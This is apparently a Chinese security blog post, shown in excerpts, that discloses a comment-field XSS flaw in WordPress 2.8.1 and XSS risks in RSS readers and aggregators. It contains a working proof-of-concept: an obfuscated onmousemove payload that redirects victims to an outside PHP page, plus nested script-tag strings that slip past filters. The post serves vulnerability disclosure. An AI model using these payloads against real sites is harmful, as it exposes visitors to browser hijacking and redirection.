wordpress281评论显示xss漏洞
by kxlzx inbreak.net
ps:感谢鬼仔’blog,XEYE’s blog协助测试。
实际上是个XSS漏洞。
POC:
在评论的网址一栏,填写
http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);
[……]
<s<script></script>cript>alert("hackedbykxlzx")<<script></script>/script>
<<script></script>script>alert("hackedbykxlzx")<<script></script>/script>
恩,放这里测几个rss的阅读器。
[……]
漏洞描述:
IE和OPERA对RSS中
<item>下的<description>标签内容解析过程如下:
首先使用HTML编码对内容解密(例:‘<’解析为‘<’),之后执行其中HTML代码。
这种解析方式导致一些RSS阅读工具对此过滤不严,出现XSS漏洞。
[……]
by kxlzx
聚合采集器是个采集网站新闻,blog文章RSS的工具。
WEB2.0后,很多网站提供了RSS搜集功能。
之后,就有很多采集RSS的工具出现,著名的有很多“周博通采集器,GOOGLE采集器等”。
采集器通过对这些站点的RSS页面轮训,获得页面中某些固定数据。
一旦采集的程序没有对引进的内容过滤,可能导致XSS攻击。
[……]